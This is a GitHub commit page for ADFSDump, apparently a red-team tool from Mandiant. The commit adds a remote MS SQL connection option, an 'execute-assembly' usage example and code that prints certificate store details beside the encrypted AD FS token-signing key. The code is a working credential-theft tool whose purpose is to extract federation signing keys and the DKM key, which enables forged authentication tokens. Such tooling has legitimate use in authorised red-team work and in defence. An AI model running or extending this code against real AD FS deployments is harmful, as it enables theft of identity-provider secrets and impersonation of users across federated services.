Added support for remote MS SQL database

mandiant · Jul 27, 2021 · 0800a6d · 0800a6d
1 parent b7d1f8b
commit 0800a6d
Show file tree

Hide file tree

Showing 5 changed files with 40 additions and 23 deletions.
diff --git a/ADFSDump/ADFSDump.csproj.user b/ADFSDump/ADFSDump.csproj.user
@@ -1,13 +1,13 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup>
-    <PublishUrlHistory>publish\</PublishUrlHistory>
-    <InstallUrlHistory />
-    <SupportUrlHistory />
-    <UpdateUrlHistory />
-    <BootstrapperUrlHistory />
-    <ErrorReportUrlHistory />
-    <FallbackCulture>en-US</FallbackCulture>
-    <VerifyUploadedFiles>false</VerifyUploadedFiles>
-  </PropertyGroup>
-</Project>
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <PublishUrlHistory>publish\</PublishUrlHistory>
+    <InstallUrlHistory />
+    <SupportUrlHistory />
+    <UpdateUrlHistory />
+    <BootstrapperUrlHistory />
+    <ErrorReportUrlHistory />
+    <FallbackCulture>en-US</FallbackCulture>
+    <VerifyUploadedFiles>false</VerifyUploadedFiles>
+  </PropertyGroup>
+</Project>
diff --git a/ADFSDump/About.cs b/ADFSDump/About.cs
@@ -18,6 +18,7 @@ public static void ShowInfo()
 
         public static void ShowHelp()
         {
+            string example = "execute-assembly ADFSDump.exe \"database:Data Source=sql.domain.com;Initial Catalog=AdfsConfigurationV4;Integrated Security=True\"";
             string Help = @"
 ADFSDump
 
@@ -32,13 +33,16 @@ Dump all sorts of AD FS related goodies.
     /domain: The FQDN of the domain, defaults to the current domain
     /server: The FQDN of the domain controller to connect to, defaults to current
     /nokey: (optional) Flag. Disable fetching of DKM key from AD
+    /database: (optional) SQL connection string if ADFS is using remote MS SQL rather than WID
 
 Requirements:
     Supports AD FS 2012 and 2016
     Must be run locally on an AD FS server. Preferably the primary
     Assumes that AD FS is configured to use WID rather than a dedicated SQL server
     Must be run using the AD FS service account
-";
+
+Example
+    " + example;
             Console.WriteLine(Help);
         }
     }

diff --git a/ADFSDump/Program.cs b/ADFSDump/Program.cs
@@ -16,7 +16,7 @@ private static Dictionary<string, string> ParseArgs(string[] args)
             try
             {
                 foreach(string argument in args)
-                {
+                {                 
                     var index = argument.IndexOf(":", StringComparison.Ordinal);
                     if (index > 0)
                     {
@@ -27,7 +27,7 @@ private static Dictionary<string, string> ParseArgs(string[] args)
                         arguments[argument] = "";
                     }
                 }
-            } catch (Exception)
+            } catch (Exception e)
             {
                Info.ShowHelp();
                Environment.Exit(1);
@@ -38,7 +38,6 @@ private static Dictionary<string, string> ParseArgs(string[] args)
         static void Main(string[] args)
         {
             Info.ShowInfo();
-
             Dictionary<string, string> arguments = new Dictionary<string, string>();
             if (args.Length > 0) arguments = ParseArgs(args);
 
@@ -47,8 +46,8 @@ static void Main(string[] args)
                 ADSearcher.GetPrivKey(arguments);
             }
 
-
-            Dictionary<string, RelyingParty>.ValueCollection rps = DatabaseReader.ReadConfigurationDb();
+            Dictionary<string, RelyingParty>.ValueCollection rps = DatabaseReader.ReadConfigurationDb(arguments);
+
             if (rps == null)
             {
                 Environment.Exit(1);

diff --git a/ADFSDump/ReadDB.cs b/ADFSDump/ReadDB.cs
@@ -23,7 +23,7 @@ public static class DatabaseReader
         private const string Adfs2019 = "AdfsConfigurationV4";
 
 
-        public static Dictionary<string, RelyingParty>.ValueCollection ReadConfigurationDb()
+        public static Dictionary<string, RelyingParty>.ValueCollection ReadConfigurationDb(Dictionary<string, string> arguments)
         {
             SqlConnection conn = null;
             string connectionString = "";
@@ -35,15 +35,22 @@ public static Dictionary<string, RelyingParty>.ValueCollection ReadConfiguration
             }
             else
             {
-                connectionString = WidConnectionString;
+                if (arguments.ContainsKey("/database"))
+                {
+                    connectionString = arguments["/database"];
+                } else
+                {
+                    connectionString = WidConnectionString;
+                }
+
             }
             try
             {
                 conn = new SqlConnection(connectionString);
                 conn.Open();
             }  catch (Exception e)
             {
-                Console.WriteLine($"!!! Error connecting to WID.\n {e}");
+                Console.WriteLine($"!!! Error connecting to database using connection string: " + connectionString + ".\n" + e.ToString());
                 return null;
             }
 
@@ -125,7 +132,13 @@ private static Dictionary<string, RelyingParty>.ValueCollection ReadWid(string d
                 if (signingToken != null)
                 {
                     XmlNode encryptedPfx = signingToken.GetElementsByTagName("EncryptedPfx")[0];
+                    XmlNode findValue = signingToken.GetElementsByTagName("FindValue")[0];
+                    XmlNode storeLocationValue = signingToken.GetElementsByTagName("StoreLocationValue")[0];
+                    XmlNode storeNameValue = signingToken.GetElementsByTagName("StoreNameValue")[0];
                     Console.WriteLine("[-] Encrypted Token Signing Key Begin\r\n{0}\r\n[-] Encrypted Token Signing Key End\r\n", encryptedPfx.InnerText);
+                    Console.WriteLine("[-] Certificate value: {0}", findValue.InnerText);
+                    Console.WriteLine("[-] Store location value: {0}", storeLocationValue.InnerText);
+                    Console.WriteLine("[-] Store name value: {0}\r\n", storeNameValue.InnerText);
                 }
 
                 Console.WriteLine("## Reading The Issuer Identifier");

diff --git a/README.md b/README.md
@@ -28,6 +28,7 @@ ADFSDump is a tool that will read information from Active Directory and from the
 * `/domain:`: The Active Directory domain to target. Defaults to the current domain.
 * `/server:`: The Domain Controller to target. Defaults to the current DC.
 * `/nokey`: Switch. Toggle to disable outputting the DKM key.
+* `/database`:  (optional) SQL connection string if ADFS is using remote MS SQL rather than WID. Wrap in quotes, i.e. "/database:Data Source=sql.domain.com;Initial Catalog=AdfsConfigurationV4;Integrated Security=True"
 
 ## Compilation Instrucrtions
 
@@ -37,6 +38,6 @@ A compiled version will not be released. You'll have to compile it yourself!
 
 ### Targeting Other .NET Versions
 
-ADFSDump's default build configuration is for .NET 4.5, which will fail on systems without that version installed. To target ADFSDump for .NET 4 or 3.5, open the .sln solution, go to Project -> Rubeus Properties and change the "Target framework" to another version.
+ADFSDump's default build configuration is for .NET 4.5, which will fail on systems without that version installed. To target ADFSDump for .NET 4 or 3.5, open the .sln solution, go to Project -> ADFSDump Properties and change the "Target framework" to another version.
 
 Note that AD FS requires .NET framework 4.5, so I'm not sure why you need to use a different version anyway :wink: